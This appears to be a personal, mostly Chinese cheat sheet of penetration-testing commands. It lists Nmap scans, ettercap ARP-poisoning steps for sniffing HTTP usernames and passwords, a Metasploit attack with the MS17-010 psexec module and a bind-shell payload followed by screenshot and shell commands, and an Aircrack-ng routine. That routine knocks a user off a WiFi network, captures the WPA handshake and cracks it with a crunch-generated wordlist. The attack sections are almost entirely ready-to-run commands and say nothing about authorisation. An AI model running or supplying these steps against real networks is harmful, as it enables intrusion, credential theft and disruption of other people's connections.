---

NMAP扫描

中文文档：http://www.nmap.com.cn/doc/manual.shtm

nmap # 帮助 -h可省略
nmap 192.168.1.1 # 最简单的命令
nmap -v 192.168.1.1 # 提高输出信息的详细度
nmap -vv 192.168.1.1 # 更详细
nmap -A 192.168.1.1 # 启用了操作系统检测(-O)和版本扫描(-sV)，以后会增加更多的功能
nmap -p 1-1024 192.168.1.1 # 只扫描1-1024端口
nmap -p 1-1024 -A 192.168.209.0/24 # 扫描192.168.209.0/24网段主机的1-1024端口，同时启用系统检测和版本扫描

ARP欺骗获取账号密码(ARP欺骗和MITM攻击)

ettercap -G # 启用ettercap的GUI

• Sniff - Unified sniffing - 选择网卡(一般eth0) - 确定
• Hosts - Host List - 选择两个目标(一般是目标主机和网关)并添加到Target 1/2
• Mitm - Arp poisoning - 勾选Sniff remote connections - OK
• HTTP账号密码会自动抓取并显示
• View - Connections

# 其它工具和命令
arpspoof

MSF入侵主机

msfupdate # 更新msf
msfconsole # 启动msf
help # 帮助
search ms17-010 # 查找ms17-010相关的模块
use exploit/windows/smb/ms17_010_psexec # 使用模块 exploit/windows/smb/ms17_010_psexec
show options # 显示选项
set RHOST 192.168.209.129 # 设置RHOST的值为192.168.209.129
exploit # 发起攻击

其它资料：https://blog.csdn.net/qq_29701419/article/details/48975769

# msf载荷，可选
show payloads # 显示载荷
set payload windows/shell/bind_tcp # 使用载荷 windows/shell/bind_tcp

# 入侵成功后的命令
help # 帮助
sysinfo # 系统信息
screenshot # 截屏
shell # 进入系统命令行

Aircrack-ng破解WiFi密码

ifconfig
# if wlan0 is manager mode:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

airmon-ng start wlan0
# notice that which interface the monitor mode is

airodump-ng [the interface(sometimes it is wlan0)]
# here choose a BSSID

airodump-ng -c [the BSSID's chanel] -w [output capfile's name] --bssid [BSSID] [interface]
# then wait for user's connect, or attack an online user

# (open a new terminal, use for attack)
aireplay-ng -0 10 -a [BSSID] -c [user's SSID] [interface]
# then the user will offline. just wait him to reconnect, then you will get the capfile(will show in the first terminal "WPA handshake")

aircrack-ng -w [dictionary's name] [capfile's name(for example:aaa-01.cap)]
# then wait for the password!!!

# PS:you can use crunch to create dictionary.
crunch 8 8 0123456789 -o dict.txt